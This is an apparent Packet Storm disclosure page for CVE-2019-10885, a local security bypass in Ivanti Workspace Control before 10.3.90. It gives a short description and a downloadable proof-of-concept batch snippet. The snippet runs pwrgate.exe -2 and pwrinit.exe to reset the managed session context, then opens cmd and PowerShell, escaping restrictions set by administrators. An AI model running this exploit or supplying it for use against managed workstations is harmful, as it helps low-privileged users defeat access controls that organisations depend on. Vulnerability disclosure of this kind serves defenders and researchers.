Ivanti Workspace Manager Security Bypass

Ivanti Workspace Manager versions prior to 10.3.90 suffer from a bypass vulnerability.

MD5 | 7d5aa5b55686f1b2087f5cd444c7b3cc

Download

Rem Remarks CVE-2019-10885 - 0day <[email protected]>
Rem An issue was discovered in Ivanti Workspace Control before
10.3.90.0. Local authenticated
Rem users with low privileges in a Workspace Control managed session
can bypass Workspace Control Rem security features configured for this
session by resetting the session context.

"%PROGRAMFILES(X86)%\RES Software\Workspace Manager\pwrgate.exe -2"
"%PROGRAMFILES(X86)%\RES Software\Workspace Manager\pwrinit.exe"
cmd.exe /k powershell.exe

Source: packetstormsecurity.com